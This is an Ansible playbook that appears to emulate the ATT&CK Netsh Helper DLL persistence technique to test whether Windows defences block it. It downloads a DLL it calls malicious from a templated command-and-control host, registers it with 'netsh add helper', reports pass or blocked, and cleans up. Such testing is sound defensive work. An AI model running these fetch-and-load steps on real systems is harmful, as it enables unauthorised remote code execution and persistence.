#T1128 - Netsh Helper DLL
- name: Netsh Helper DLL - Windows
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: download malicious dll
      tags: always
      win_shell: Invoke-WebRequest -Uri http://{{ cnc_fqdn }}:{{ cnc_port }}/{{ cnc_dll }} -OutFile C:\temp\{{ cnc_dll }}
      register: command_result
      ignore_errors: yes
    - name: check if download successfull
      tags: always
      debug: msg="Playbook Completed#T1128#failed#win#"
      when: command_result.rc == 1
    - block:
      - name: execute malicious dll
        tags: always
        win_command: |
          cd c:\temp
          netsh.exe add helper {{ cnc_dll }}
        ignore_errors: yes
      - name: Wait before status check
        tags: always
        wait_for: timeout=10
        delegate_to: localhost
      - name: check file exist
        tags: always
        win_stat:
          path: c:\temp\evil.txt
        register: T1128
      - name: check if playbook was blocked
        tags: always
        debug: msg="Playbook Completed#T1128#blocked#win#"
        when: T1128.stat.exists == False
      - name: check if playbook was successfull
        tags: always
        debug: msg="Playbook Completed#T1128#passed#win#" 
        when: T1128.stat.exists
      - name: cleanup
        tags: always
        win_command: |
          del C:\temp\{{ cnc_dll }}
          del C:\temp\evil.txt
          netsh.exe del helper {{ cnc_dll }}
        when: T1128.stat.exists
      when: command_result.rc != 1

